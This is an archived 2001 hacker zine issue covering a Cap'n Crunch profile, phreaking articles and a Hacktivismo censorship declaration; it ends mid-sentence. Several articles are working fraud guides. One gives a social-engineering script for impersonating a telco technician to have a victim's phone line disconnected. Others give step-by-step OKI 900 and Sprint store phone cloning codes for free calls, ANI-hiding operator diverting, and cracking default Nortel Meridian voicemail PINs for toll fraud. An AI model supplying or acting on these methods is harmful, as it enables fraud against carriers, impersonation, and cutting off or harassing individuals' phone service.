home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 120.0 KB | 2,312 lines |
-
-
-
- H A C K E R ' S D I G E S T
- ----------------------------------------------------------------------
- www.hackersdigest.com
- SUMMER 2001 ISSUE 1
-
-
-
-
- Da Wutang
-
- =============================================*
- |Hello World
- ============
- |Hacker's Digest Focus Cap 'n Crunch
- ====================================
- |The New AT&T Network
- =====================
- |The Art of the Force Out
- =========================
- |OKI 900 Reprogramming/Cloning in a Nutshell
- ============================================
- |Exploring Sprint PCS
- =====================
- |Exploring MTV Telecom
- ======================
- |International Bookburning in Progress
- ======================================
- |Digital Multiplexing System
- ============================
- |Cross Site Scripting the Security Gap
- ======================================
- |Shell/PPP Connectivity over Cellular Networks
- ==============================================
- |Nortel Millenium Payphones
- ===========================
- |Writeing Buffer Overflow Exploits
- ==================================
- |What You Don't Know Will Hurt You
- =============================================*
-
-
-
-
- +==============================================================================+
- | Get The Latest Issues |
- | Join the Mailing List |
- | --------------------- |
- | E-mail hd-request@hackersdigest.com with the word subscribe in the |
- | subject line. |
- +==============================================================================+
-
-
-
-
- =========================[ Hello World ]=========================
-
-
-
- Its here, the first issue of HackerÆs Digest, sixty pages of kung fuck
- that you would be stupid not to read. You might be asking yourself just
- what the hell we are trying to do. Our goal is to provide solid
- information to the hacker/phreaker community. Hackers you say? Those punk
- kids who billed $5,000 dollars to my credit card? Fuck no... We are not
- here to defend, support or encourage petty crimes that are done with
- computers. We are about cutting edge technology, how technology works,
- its faults, and how it effects our life. We are about learning and answering
- questions that you canÆt ask anywhere else.
-
- Now that you know what we are about let me explain how we are operate.
- We offer one year subscriptions for $15.00 and a two year subscription for
- $30.00. We also have the magazine online for free. Why do we sell and
- offer the magazine for free? We need the support. HackerÆs Digest operates
- off of a shoe string budget and we need your support to keep us running.
-
- There are other ways to support HackerÆs Digest. We need letters, articles,
- and comments to tell us what you want to see in HackerÆs Digest. Everything
- you send to us will be read, so send it in. The fact is that we need to
- know that you are out there and we are going to keep putting issues out
- and paying the bills as long as we know people are out there giving a damn
- about what we are doing.
-
- So how important is it to have a magazine that supports freedom of speech?
- With new laws being passed such as the Digital Millennium Copy Write Act,
- cameras in the streets scanning everyone's face to a database that is made
- up of data that gets populated from the DMV. More worms being released into
- the wild, feeding the fire about "Cyber Terrorism" You tell me.
-
- You will not see banners or paid advertisements of any sort on our web site
- or in our magazine. We are not about making money. We are about providing
- to the hacking/phreaking community that has provided so much to us. To
- educate our peers who have educated us.
-
- You will notice that this issue does not have any letters in it. Well its
- our first issue so what do you expect. In the future we will offer ten pages
- of letters so send them in. There is little chance it will not get printed.
- We are also excepting any type of art you could send in. Drawings, logos,
- and covers. As well as ideas for any covers you might have. Anything will
- help.
-
- We could have not gotten this together in time without support from alot
- of friends. Special thanks to PPC (www.ppchq.org) and Phone Geeks
- (www.phonegeeks.com). All of our writers and everyone who helped to make
- this happen.
-
-
-
- ===========[ Hacker's Digest Focus Cap 'n Crunch ]===============
-
-
-
- Who is Cap æn Crunch
-
- Cap æn Crunch has to be one of the most well known phone phreaks to go down
- in history. You may have came across his name in a text file or heard him
- speak at H2K in the Old Timers panel. According to Cap æn Crunch his first
- adventure into phone phreaking came when he received a call from a blind kid
- who had heard him on the radio from a home made transmitter. He asked the
- kid for his phone number and he called him back, to his surprise it was a
- loop.
-
- He visited the blind kid at his house and he wanted to know if Cap æn Crunch
- could build him a MFÆer which is a box that plays 6 tones, 700, 900, 1100,
- 1300, 1500, and 1700 Hz. This is widely known as a blue box. The kid called
- a 800 number and then seized a trunk with his organ.
-
- Calling a conference line that could only be accessed if you owned a blue box
- Cap æn Crunch would talk hours on end about the phone system with other phone
- phreaks. If they found a problem in the phone system such as a sick trunk they
- would call the phone company and report the problem. They would get responses
- such as "WeÆve been trying to trace down that stuck tandem for months, how did
- you find it?". They even had the phone company thinking they worked for them.
-
- Cap æn CrunchÆs Arrest
-
- In 1971 there was a article in the San Jose Mercury about a guy selling blue
- boxes to members of organized crime. The phone company then tapped the
- conference line and soon the guy was arrested. To get back at the phone company
- he got in touch with Ron Rosenbaum who wrote the article "The Secret of the
- little blue box" that is easily to find this day on the internet. Ron Rosenbaum
- got in touch with the blind kid for interviews. With out knowing that Cap æn
- Crunch did not want to have anything to do with Ron Rosenbaum the blind kid
- told him everything. Cap æn Crunch ran to a news stand and was shocked at all
- the errors in the article. He just knew the FBI was going to come for him so
- he completely stopped everything.
-
- In 1972 Cap æn Crunch stopped at a 7-11, as soon as he got out of his car he
- was jumped by 4 men who threw him against the car, handcuffed him and read
- him his rights.
-
- Serving Time
-
- Cap æn Crunch served his time at Lompoc minimum security prison. He bought a
- radio and modified it to pick up the prison guards walkie talkieÆs. He would
- have a friend wait for him on a loop and would three way other people from
- there. In jail he showed other inmates how to build cheese boxes. He said it
- was a challenge to teach people who could hardly read or write how to build
- things such as laser bug detectors etc... Cap æn Crunch volunteered to work
- in the pig stables. He said that since he grew up on a farm and really liked
- animals he did not mind the labor. By teaching other inmates, it was a way to
- keep his mind occupied and make time go a little faster. It also helped his
- popularity and kept him from having to do the shittiest jobs.
-
- Cap æn Crunch and Apple
-
- If you decide to visit Cap æn Crunches web site you will see his support for
- apple for being a secure operating system, but his roots with apple go further
- then that. After the article "The Secret of the little blue box" came out, Steve
- Wozniak, co founder of Apple Computers wanted to contact him. Steve Wozniak
- contacted Cap æn Crunch and it was not long before he talked him into visiting
- UC Berkeley. When he went to Steve WozniakÆs dorm, he also found Steve Jobs and
- Bill Klaxton waiting for him. He explained how to use it and better what not to
- do with it. He told Steve Wozniak not to sell blue boxes but he did not listen
- and made enough money to pay for school and finance the Apple I project.
-
- Cap æn CrunchÆs Second Arrest
-
- Yes, Cap æn Crunch was arrested a second time. He was friends with great social
- engineering artist named Adam. Adam contacted Cap æn Crunch and talked him into
- visiting him. He had broken into COSMOS. This was the phone companyÆs computer
- system and had the power to do anything. Adam visited him a few more times. Cap
- æn Crunch would take him to PotLuck dinn- ers hosted by peopleÆs Computer
- Company. When he was at a food market Adam had flagged him down to a pay phone
- and put it in his face to talk to a friend not knowing how the call was paid.
- In 1974 Cap æn Crunch was arrested again. Come to find out, Adam had sold him
- out to the FBI and had a pay phone tapped so it was like he blue boxed the call.
- He also found out that Adam got a few other people busted that would not have
- got back into blue boxing if Adam did not contact them.
-
- Pranking the President
-
- Cap æn Crunch found a way to listen to on going conversations the same way the
- operator can break into a call if its a emergency y. Cap æn Crunch was scanning
- the 202 area code which was for the Washington area. They found the CIA Crisis
- hot line. They tapped the number and heard people talking they were sure was
- CIA. They soon found the code word that would connect them to the president.
- They called up and heard someone say "9337" Cap æn Crunch's friend said "Olympus
- please!", the man at the other end said "One moment sir!" sure enough a man that
- sounded alot like Nixon said "WhatÆs going on?". his friend said "We have a
- crisis here in Los Angeles!", Nixon said "WhatÆs the nature of the crisis?", his
- friend said in a serious tone of voice "WeÆre out of toilet paper sir!". Nixon
- said "WHO IS THIS?" his friend hung up. No one knows what happened to the tapes.
-
- Cap æn Crunch Now
-
- Cap æn Crunch is currently working on his own business, web hosting and his new
- firewall Intrusion Detection System called the "Crunch Box" that is built on
- OpenBSD. His web hosting service has to be the most secure servers I have ever
- seen. His whole network is running Mac OS and we all know how many security
- holes there are for the Mac.
-
- I asked him what he thought about phone phreaking groups such as Phone Losers of
- America and he thought they were great. He also said they contacted him and
- asked if he would link to there site. He checked it out and thought they were
- worth the link. I also asked him, if given the chance would he do it all again.
- He told me without a doubt.
-
- Cap æn Crunch honestly had to be one of the nicest phone phreaks I have ever
- met. Its clear that all the hype his name has is well deserved and has not even
- gone remotely close to his head and if you have a chance to email him I would.
- He has to be the most interesting person I have ever met.
-
- http://www.webcrunchers.com
-
-
-
- =====================[ The New AT&T Network ]=====================
- =====================[ by Lucky225 ]=====================
-
-
- It seems that AT&T was not to fond of my ANI Spoofing article that appeared in
- 2600 (17:4) Just a few days after I picked up a copy of the new 2600 and saw
- that my article had been printed, I started noticing a lot of changes in the
- AT&T network. First they shut off their 800 ANAC, a few days later calls that
- were routed to 800-673-7286 by the Verizon Long Distance operator were handled
- strangely. I began noticing that if I made a call through the Verizon Long
- Distance operator to 800-673-7286, I could place calls to 800 numbers NOT on the
- AT&T network, but that the ANI was being sent as '615-986-9873' or ANI II Pair
- 23 followed by areacode 904. Thus, calls placed through the Verizon Long
- Distance operator to AT&T's 800-operator could not be used to spoof ANI any
- more. The 615 number belongs to a PBX owned by AT&T in Nashville, TN. I could
- still spoof ANI on the AT&T network if I diverted through my local operator or
- various other 101XXX long distance carrier operators, but this April it stopped
- working. I soon figured out what was happening. AT&T has centers all around the
- country including Alaska and Hawaii. The way SS7 works, depending on where your
- calling from, an 800 number can be routed to various other places. For example
- their could be a nationwide 800 number that alows you to call from any where in
- the country, but say a person that calls the same 800 number from Florida could
- get routed to that business's office on the east coast, and a person that calls
- from California may get routed to the west coast office. That's what it's like
- when you call 800-673-7286, you get routed to the nearest AT&T center near you
- to take the call. So when I was making a call through the Verizon Long Distance
- operator to 800 673 7286 I would get routed to the Florida AT&T center because
- the Verizon Long Distance operator I got was based out of Florida(813), which is
- why when I had the AT&T operator dial an ANAC it would show 23-904(Florida).
- However, not all Verizon Long Distance operators are based in Florida, some of
- them are based out of Kentucky(606) which for whatever reason will get you the
- Nashville, TN Center. The Nashville Center is the only center I have seen so far
- that transmits ANI with ANI II Pair "00" and a full 10 digit phone
- number(615-986-9873)
-
- The AT&T Centers: As I mentioned, there are various AT&T centers throughout the
- country, and they are also the centers that handle the automated AT&T Long
- Distance operator services as well as 800-call-att and 800-operator. With the
- new upgrade that AT&T is implementing (wide spread across the country I preditct
- by now) each center is geting a total make over, there will be no more ANI
- spoofing to AT&T numbers, they are updating these centers so that you can call
- any 800 number through the AT&T carrier. Calls to 800 673 7286 that have an ANI
- fail will no longer use the phone number you give as ANI when calling other toll
- free numbers. Instead, ANI II pair 23 and the areacode of the AT&T center will
- be used. However, the best part is that you can place calls to toll free numbers
- without speaking to an operator. Simply dial 10-10-ATT-0(10-10-288-0) and enter
- the toll free number you want to call. The ANI will show up as ANI II pair 23
- and the areacode of the AT&T Center, op diverting without even having to speak
- to the op! However you will notice that if you try to dial 800-call-att or
- 800-673-7286 it will apear that your ANI still shows up, this is because these
- numbers are handled by the same AT&T center. However any toll-free number not
- handled by the AT&T center(basically any toll-free number that's not used for
- AT&T operator services) will be processed with your ANI not being transmited.
- There are a few advantages and disadvantages of this new system. The only real
- disadvantage is that you can not spoof ANI any more. The advantages however are
- that you can place calls to basically any toll free number you wish without your
- ANI being passed simply by dialing 10-10-ATT-0 and then pressing in the toll
- free number you want to call at the AT&T prompt. You can even use this at
- payphones to call toll free numbers that don't allow payphone calls or to get
- around payphone surcharges. Op diverting used to be so hard, local ops not
- wanting to help you out, and 101XXX carrier ops only being able to be reached
- from certain parts of the country, and the real downside being that you had to
- talk to an operator, that by the way might listen in to your call, when trying
- to divert to toll free numbers, but now thanks to AT&T's new network that you
- can reach anywhere in the country by simply dialing 10-10-288-0 or even just 00
- if you have AT&T, and you dont even have to talk to an operator you just punch
- in the toll free number you want to call on your touch tone keypad. You can even
- divert to that toll-free number using your modem to find out what that carrier
- is you always wanted to know is by setting your modem to dial 10-10-288-0,
- 1-800-xxx-xxxx, without fear of your ANI showing up. I'm sure AT&T logs your ANI
- and probably would take action if you were harassing a toll-free number long
- enough, but for now you can think of 10-10-288-0 as your own free ANI blocking
- service.
-
- Refrence:This is a follow up to an article in 2600 17:4 titled "Confusing ANI
- and Other Phone Tricks"
-
-
-
- =====================[ The Art of the Force Out ]=====================
- =====================[ by herf ]=====================
-
-
-
- You may have read texts on social engineering cheeseburgers from McDonalds but
- that is not what this paper is about. I will go into getting a circuit busied
- out using your telco's dumbass repair techs.
-
- I'm sure your question has shifted to how? It's actually pretty simple.
-
- Ok, I'll go over having a person's line busied out.
-
- Before accomplishing this, you'll need to understand what having a circuit
- busied out means. When out on a job, field technicians have to get a ciccuit
- disconnected for a short period of time before working on the line. Why?
- Because 110 volts of electricity surges through the circuit when phones ring.
- Bascially, if you were holding both tip and ring and the circuit tried to
- connect a call, you'd be unpleasently shocked out of your mind. So, to avoid
- lawsuits from their field techs, telco tech support enables circuits to be
- remotely severed.
-
- Now, you'll need to make an identity for yourself. As for myself, I most
- commonly refer to myself as Chris Knight and use an employee ID I found in Bell
- Atlantic's trash. I have a fake voices I use to connect personally with whatever
- repair tech I talk to. If it's a black man or woman, I speak using a black man's
- accent with a touch of Southern. If it's a white man or woman, I speak like a
- redneck. The reason I do this is to fool the repair tech into thinking I'm
- beneath them, into thikning that my intellectual capacity is that of a carrot.
- Why? Because if they think their time is more important then mine, they'll
- become impatient and do whatever I want them to.
-
- The engineering aspects of having someone's circuit busied out are pretty
- mindless. Get your telco's field tech support number, for one. Social
- engineering it out of the CO is pretty easy. All you have to do is ask to speak
- with a supervisor, tell him you're out on a ticket, you're new and the presets
- on your set aren't working correctly. If he asks where your reference sheet is,
- tell him it's buried underneath your equipment somewhere. If he still resists,
- tell him you're already in overtime and you need to get in touch with field tech
- support before working on the line. When he hears the term "Overtime" he'll
- oblige because he's a nazi.
-
- Ok, make sure to op divert to the field tech support toll free number because
- you don't want to go to jail. Once connected, enter in whatever menu number it
- is to speak with a repair technician. When the repair tech gives the cute little
- welcome schpiel, ask their name again to show you care. When you speak, make
- sure you sound like a disgruntled employee to relate with them. Announce your
- name and ID number. If you don't have one, they're usually 3 digits. Just make
- one up. If they say it's not listed, tell them you just got out of training.
- Anyway, open the conversation like this: "Hey, what's your name again? - Oh, ok.
- Well (blank), I'm out on a trouble ticket and I need to get a circuit forced
- out." - They'll ask why you haven't called your CO to get it done. That's when
- you say, "Well, I tried calling my CO but the line has been busy for 30 minutes.
- Same with the WMC. I'm already on overtime and my foremer(foreman) doesn't like
- that so I took desperate measures. Can you help me out or transfer me to someone
- who can, please?"
-
- When they say yes, you're in. It's only a matter of sounding authenticate. If
- you can't sound authenticate, you probably shouldn't be doing this anyway.
-
- Ok, so now you know and knowing is the first step to serious jail time.
-
- Oh, below, I'll list some acronyms that might help to authenticate yourself.
-
- WMC - Work Maintenence Center (Verizon+) WAC - Work Assessment Center
- (Bellsouth- Appended by khecka) NOC - Network Operations Center IR - Tech ID
- Trouble Ticket - Issued to field technicians to identify different jobs.
- Former(Foreman) - Boss SISSYTECH - Slang for a technician who only does house
- repair.. Force Out - Busy Out
-
- Peace and Fleece. One step closer to having your sheep ID revoked.
-
-
-
- ==============[OKI 900 Reprogramming/Cloning in a Nutshell]==============
- ==============[ by dark_fairytale ]==============
-
-
-
- Ok, so you've read the Oki 900 Guide by Iceberg and you still don't fully
- understand how to reprogram/clone your Oki 900. Well now i'm going to explain in
- the simplest terms possible on just how to do just that for those of you that
- still don't understand.
-
- Materials Needed:
-
- Oki 900 with 4712 Chip Modification A Valid Esn and Nam Pair (ESN should already
- be in hex)
-
- Ok, now if you don't know what a Esn and Nam pair is then you shouldn't be
- reading this. However, if you do, continue on. The very first thing you'll need
- to do is to put your Oki 900 into test mode/debug mode by doing the following:
- Power up the phone. Hold down the 7 and 9 buttons for about a second, release.
- Quickly enter Menu, Snd, End, Rcl, Sto, Clr. The phone should now read Good
- timing!!! If not, start over. If all goes well up until here hit 1 and 3 buttons
- at the same time and it will clear the Good timing from the display. Ok, now
- you're ready to program in your ESN. You have 5 locations for ESN is you are
- using the 4712 chip mod and you will have to program in each byte of ESN
- separately in it's separate location in order for it to work. To begin
- programming the ESN into the phone: hit #54 followed by the 4 digit location
- followed by the byte of ESN then Snd
-
- Every ESN location is as follows:
-
- -Esn 1 Locale- BE8E BE8F BE90 BE91
-
- -Esn 2 Locale- BE93 BE94 BE95 BE96
-
- -Esn 3 Locale- BE98 BE99 BE9A BE9B
-
- -Esn 4 Locale- BE9D BE9E BE9F BEA0
-
- -Esn 5 Locale- BEA2 BEA3 BEA4 BEA5
-
- Now you may be looking at this and still wondering, what the fuck? Ok, let me
- explain more clearly here. An ESN is an 8 digit/letter number combination when
- properly put into hex mode which will be needed when reprogramming the ESN. When
- reprogramming the ESN you will enter it two digits/letters at time into the Oki.
- For example, let's say your ESN is: BD94-A623 and you want to program that into
- ESN Slot 1. Therefore you would program: BD into location BE8E, 94 into BE8F,
- and so on.... Ok, I hope that helps a little for you beginners. When
- reprogramming your ESN more than likely you will have to program in a letter. To
- get letters all you simply need to do is hit the * key on the phone before
- hitting the corresponding number. Here is a key for that as well:
-
- STAR KEY A=*1 B=*2 C=*3 D=*4 E=*5 F=*6
-
- On last quick note on reprogramming the ESN, hit # before each entry and send to
- save it before you move on. Ok,now after you get the full ESN programmed in you
- will have to reboot the phone. So simply turn the phone off for a second or two
- and turn it back on. Now comes reprogramming the NAM. As soon as you power up
- the phone you will have to: Hold Rcl and Mnu at the same time for a second or
- two, release. Quickly followed by *,6,2,7,2,9,8,5,4,#. If entered correctly some
- numbers will pop up on the display followed by the words Dealer which means just
- that, you are in Dealer mode and your NAM is ready to be reprogrammed. Ok, now
- use the volume button on the side to scroll down to the corresponding NAM to the
- ESN you just programmed in. Let the display sit there for a second and the
- prompt will then come up Own #. Now re-enter the NAM that you have for your ESN
- and hit STO. With that being done hit the Down Volume button three times and you
- should see a prompt that reads ACCOLC #. Here you need to enter 0 followed by
- the last digit of the NAM you are programming in and hit STO once more. Once
- that is done shut the phone off once more to reboot and power it back on. Now
- you are ready to select your NAM and ESN from the Admin Menu to put it to use.
- When the phone powers back up hit Menu 8 times for the Admin Menu to appear. Hit
- recall to access it and enter your security code. The default password on most
- phones is 123456, but please note that it can be changed. Once into the Admin
- menu hit RCL to choose the NAM you want to use and hit STO and the prompt should
- appear: RESET TIMER. Turn the phone off and turn it back on and you're almost
- done. Now getting the ESN and NAM to work properly may take some experimenting
- with the carrier selection which varies from A to B. Most A side carriers are
- hard to clone do to rf fingerprinting. To access the carrier selection again hit
- Menu 8 times and go into the Admin menu. Enter your password and hit the Down
- volume arrow button until you see the System Prefer followed by whichever
- carrier is selected. Hit STO to select. Try your pair with A, if that doesn't
- work simply go back and Try with B. If that doesn't work, than you have a bad
- pair and should go out and get another. Ok, I hope this text file has helped
- those who have had trouble understanding the concept of reprogramming/cloning
- the OKI 900 with 4712 MOD and if it hasn't then i strongly suggest you find a
- new hobby. Thanks for reading.
-
- References: The Complete Oki 900 Guide by Iceberg.
-
- Shouts: PPC UP$ P.O.T.S. Plexus Liquid Illusion Comic_1 DrDaedlus Redxer
- HateServ
-
- the list goes on and on......
-
-
- =====================[ Exploring Sprint PCS ]=====================
- =====================[ by Okiwan ]=====================
-
-
-
- Introduction Here's a sweet exploit I came up with while waiting in line at the
- Sprint PCS store. First a little back story, Sprint PCS is a digital CDMA
- network making it virtually impossible to clone...or so we thought. The weakness
- of Sprint's network is that there digital coverage is pathetic. To fill up the
- HUGE holes in their network, Sprint has roaming agreements throughout the US.
- The roaming agreement is that whenever there isn't a digital signal (1900) the
- phones will drop to analog (800) which is what Sprint calls "roaming".
-
- THE EXPLOIT Every Sprint PCS store has a sales floor where they have activated
- phones that you can pick up and use. Sprintstores do that so you can try out
- their phones to hear the sound quality of each different phone before you buy
- one or to call home(or anyone) as a courtesy call. In fact, every time I go to a
- Sprint store I always make at least 15-20 prank calls all over the US.
-
- Basically all you need to do is: 1)Go through the menu and look for the phone's
- telephone number which is your MIN (mobile id number) 2)Look at the back of the
- phone and find an 8 character number/letter sequence and this is your ESN.
- 3)Program the ESN and MIN into your analog OKI-900 phone.
-
- Guess what you just cloned the Sprint PCS's courtesy phone. So when you use your
- cloned OKI-900 phone, Sprint PCS will think your roaming since your using an
- analog only phone.
-
- These phones are activated using unlimited calling minutes and I doubt that the
- Sprint PCS store looks though the hundreds off phones calls that are made from
- these phones each month so there's little to no chance of getting caught.
- There's like 7-8 different models out right now so you should get all 7-8
- accounts and use'em like crazy.
-
-
- =====================[ Exploring MTV Telecom ]=====================
- =====================[ by dark_fairytale ]=====================
-
-
-
- MTV. You all know the name. You've all probably watched it at one time or
- another. Who hasn't? One day this past spring , I happened to be watching MTV.
- In fact it was an episode of Total Request Live. If you haven't seen this (which
- most of you probably have) show, I'll cover the premise briefly. Carson Daly
- hosts this live daily show from MTV Studios in New York, NY, which basically
- caters to the teeny bopper fad of boy bands and Britney Spears. Every once in a
- brief while you might actually see a real band in a video, but very rarely. Go
- figure. Anyways, I'm sitting there watching this show, TRL, when they say
- they're gonna have a contest. WOWIE! A contest that will go something like this:
- In every top 10 video there will be a hint/clue/question asked and the answer is
- a number. When all the numbers are revealed, you will have the phone number for
- the TRL Studio Phone which is no more than ten feet away from Carson Daly's fat
- head.
-
- Now normally, I wouldn't be impressed with their cheesy contests, but this one
- somehow piqued my interest. Imagine having the number to that phone to disrupt
- their live show day after day to constantly harass Carson Daly. Oh what fun that
- would be! Eh! I had to have this number. So I raced for a pen and paper and sat
- through the whole damn show jotting down number after number. But, before the
- show had ended, I had remembered someone mentioning to me before that MTV/Viacom
- had it's very own exchange in New York. Why would such a company have it's very
- own exchange, is beyond my comprehension, but tis true. The Viacom exchange is
- 212 846. I had these first six numbers, because I already had a number within
- MTV studios that i knew was legit.
-
- So on with the contest with my cheating going on already. Well turns out, MTV
- decided to give everyone a chance to win the contest earlier than expected by
- having the number 2 video question be, "how many times is rollin said in the
- following video Limp Bizkit's Rollin?" equal out to the last 2 digits of the
- phone number. Up to this point, I had all the numbers correct. But somehow the
- light gleaming off of Fred Durst's bald head threw me off and I got confused and
- blew that. Foiled again! After someone rang the phone next to Carson Daly, they
- scrolled the number by on the screen for the phone and I quickly jotted it down.
- I raced for the phone to give Carson Daly a call.
-
- I quickly dialed 212 846 5581. The phone rings a couple times and a woman
- answers. S o I say, "Hello." She says, "Who is this?" so i reply with, "Uhhhhh,
- who is this??" She then proceeds to yell at me and say, "THEY MESSED UP! QUIT
- CALLING! THEY GAVE OUT THE WRONG NUMBER ON THE AIR!" and slams the phone down.
-
- What? MTV messed up and gave out one of their MTV employees phone numbers
- instead? Apparently so, since I obviously wasn't the first confused person this
- woman had talked to and she was obviously ticked off about the whole ordeal, but
- someone had rang the MTV phone to claim their prize. So was it just a mix up on
- the winner's behalf? Was the whole contest rigged? I'm still not sure to tell
- you the truth, and I don't really care, but this is what started my mission.
-
- My mission really had no climax or finality to it. I was just determined to come
- up with some interesting phone numbers in the MTV/Viacom system by demon dialing
- the exchange. I also made it a real point to come up with that "secret" MTV TRL
- phone number so i could talk to Carson during the show.
-
- Anyways after hours of dialing and dialing I finally realized that MTV had a ton
- of people working for them I never heard of. Useless people that probably no one
- in the world had even heard of to tell you the truth. I also discovered that MTV
- uses a Nortel Meridian system for it's telephony needs. We all know just how fun
- these can be to play with. If you don't know what I'm talking about, let me
- explain. Nortel manufactures these wonderous devices which are installed with
- default, usually 4 number, pins. What that means is the pin for a 4 digit
- mailbox will match the login if it isn't changed by the owner. You can usually
- crack into these babies within ten minutes using random guessing at numbers and
- a little common sense. Did I also fail to mention that some Meridians are
- equipped with outdialing features? I think you know what I'm getting at. One
- could easily rack of tons of toll fraud on MTV's behalf if they really wanted to
- and with what i'm sure is a multi-million dollar network, they would probably
- never even notice.
-
- Anyways, back to the story. I'm dialing around and dialing around when I finally
- realize this is completely useless. The chances of me finding anyone famous'
- number is a long shot at the rate I'm going. So what do I do? I give up.
-
- What does it matter? I already have Serena Altschul's MTV number and it's not
- that hard to run across on the internet if you know the right people. I've
- talked to her on a couple occassions and may I say, she is not the most
- courteous person on the telephone. Serena, if you're reading this, I don't like
- you. Just thought I would say that.
-
- So what I have learned here? I've learned that MTV does in fact have their own
- exchange in New York, to reasons unknown to me. MTV's telephone network operates
- off a Nortel Meridian System. MTV pays a lot of useless people to sit around all
- day, and I have a few interesting numbers. So I have this text file now of names
- and numbers at MTV Viacom and I've narrowed the numbers down to what I think may
- be the TRL phone. My guess is: 212 846 5781, (which usually rings and rings. Did
- they turn the ringer off? Rats, foiled again.)but I'm pretty sure they could
- change the thing if they really wanted which is a total letdown nonetheless.
- Failure, curiosity, and sore fingers. It's all in days' work for this common
- phreak.
-
-
- =================[INTERNATIONAL BOOKBURNING IN PROGRESS]==================
- =================[ by Cult of the Dead Cow ]==================
-
-
-
- Free speech is under siege at the margins of the Internet. Quite a few countries
- are censoring access to the Web through DNS [Domain Name Service] filtering.
- This is a process whereby politically incorrect information is blocked by domain
- address -- the name that appears before the dot com suffix. Others employ
- filtering which denies politically or socially challenging subject matter based
- on its content.
-
- Hacktivismo and the CULT OF THE DEAD COW have decided that enough is too much.
- We are hackers and free speech advocates, and we are developing technologies to
- challenge state-sponsored censorship of the Internet.
-
- Most countries use intimidation and filtering of one, kind or another including
- the Peoples Republic of China, Cuba, and many Islamic countries. Most claim to
- be blocking pornographic content. But the real reason is to prevent challenging
- content from spreading through repressive regimes. This includes information
- ranging from political opinion, "foreign" news, women's issues, academic and
- scholarly works, religious information, information regarding ethnic groups in
- disfavor, news of human rights abuses, documents which present drugs in a
- positive light, and gay and lesbian content, among others.
-
- The capriciousness of state-sanctioned censorship is wide-ranging. [1]
-
- * In Zambia, the government has attempted to censor information revealing their
- plans for constitutional referendums.
-
- * In Mauritania -- as in most countries --, owners of cybercafes are required to
- supply government intelligence agents with copies of e-mail sent or received at
- their establishments.
-
- * Even less draconian governments, like Malaysia, have threatened web-publishers
- for violating their publishing licenses by publishing frequent updates: _timely,
- relevant_ information is seen as a threat.
-
- * South Korean's national security law forbids South Koreans from having any
- contact -- including contact over the Internet -- with their North Korean
- neighbors.
-
- * Sri Lanka threatened news sites with possible revocation of their licenses if
- coverage of a presidential election campaign was not partial to the party of the
- outgoing president.
-
- The risks of accessing or disseminating information are often great.
-
- * In Ukraine, a decapitated body found near the village of Tarachtcha is
- believed to be that of Georgiy Gongadze, founder and editor of an on-line
- newspaper critical of the authorities.
-
- * In August, 1998, eighteen year old Turk Emre Ersoz was found guilty of
- "insulting the national police" in an Internet forum after participating in a
- demonstration that was violently suppressed by the police. His ISP provided the
- authorities with his address.
-
- * Journalist Miroslav Filipovic has the dubious distinction of having been the
- first Journalist accused of spying because of articles published on the Internet
- -- in this case detailing the abuses of certain Yugoslav army units in Kosovo.
-
- We are sickened by these egregious violations of information and human rights.
- The liberal democracies have talked a far better game than they've played on
- access to information. But hackers are not willing to watch the custodians of
- the International Convention on Civil and Political Rights and the Universal
- Declaration of Human Rights turn them into a mockery. We are willing to put our
- money where our mouth is.
-
- Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO DECLARATION
- as a declaration of outrage and a statement of intent. It is our Magna Carta for
- information rights. People have a right to reasonable access of otherwise
- lawfully published information. If our leaders aren't prepared to defend the
- Internet, we are.
-
- ---------------------------------------------------------------------
-
- [1] some information cited in this press release was either paraphrased, or
- quoted directly, from the "Enemies of the Internet" report published by
- Reporters Without Frontiers, and may be found at http://www.rsf.fr
-
- THE HACKTIVISMO DECLARATION assertions of liberty in support of an uncensored
- internet
-
-
- DEEPLY ALARMED that state-sponsored censorship of the Internet is rapidly
- spreading with the assistance of transnational corporations,
-
- TAKING AS A BASIS the principles and purposes enshrined in Article 19 of the
- Universal Declaration of Human Rights (UDHR) that states, _Everyone has the
- right to freedom of opinion and expression; this right includes freedom to hold
- opinions without interference and to seek, receive and impart information and
- ideas through any media and regardless of frontiers_, and Article 19 of the
- International Covenant on Civil and Political Rights (ICCPR) that says,
-
- 1. Everyone shall have the right to hold opinions without interference.
-
- 2. Everyone shall have the right to freedom of expression; this right shall
- include freedom to seek, receive and impart information and ideas of all kinds,
- regardless of frontiers, either orally, in writing or in print, in the form of
- art, or through any other media of his choice.
-
- 3. The exercise of the rights provided for in paragraph 2 of this article
- carries with it special duties and responsibilities. It may therefore be subject
- to certain restrictions, but these shall only be such as are provided by law and
- are necessary:
-
- (a) For respect of the rights or reputations of others;
-
- (b) For the protection of national security or of public order, or of public
- health or morals.
-
- RECALLING that some member states of the United Nations have signed the ICCPR,
- or have ratified it in such a way as to prevent their citizens from using it in
- courts of law,
-
- CONSIDERING that, such member states continue to willfully suppress wide-ranging
- access to lawfully published information on the Internet, despite the clear
- language of the ICCPR that freedom of expression exists in all media,
-
- TAKING NOTE that transnational corporations continue to sell information
- technologies to the world's most repressive regimes knowing full well that they
- will be used to track and control an already harried citizenry,
-
- TAKING INTO ACCOUNT that the Internet is fast becoming a method of repression
- rather than an instrument of liberation,
-
- BEARING IN MIND that in some countries it is a crime to demand the right to
- access lawfully published information, and of other basic human rights,
-
- RECALLING that member states of the United Nations have failed to press the
- world's most egregious information rights violators to a higher standard,
-
- MINDFUL that denying access to information could lead to spiritual,
- intellectual, and economic decline, the promotion of xenophobia and
- destabilization of international order,
-
- CONCERNED that governments and transnationals are colluding to maintain the
- status quo,
-
- DEEPLY ALARMED that world leaders have failed to address information rights
- issues directly and without equivocation,
-
- RECOGNIZING the importance to fight against human rights abuses with respect to
- reasonable access to information on the Internet,
-
- THEREFORE WE ARE CONVINCED that the international hacking community has a moral
- imperative to act, and we
-
- DECLARE:
-
- * THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS INCLUDES THE
- LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION, WHETHER BY SHORTWAVE
- RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL INTERNET, OR OTHER MEDIA.
-
- * THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE PUBLICATION OF
- PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY, AND MATTERS RELATED TO
- PERSONAL PRIVACY AND PRIVILEDGE, AMONG OTHER ACCEPTED RESTRICTIONS. BUT WE
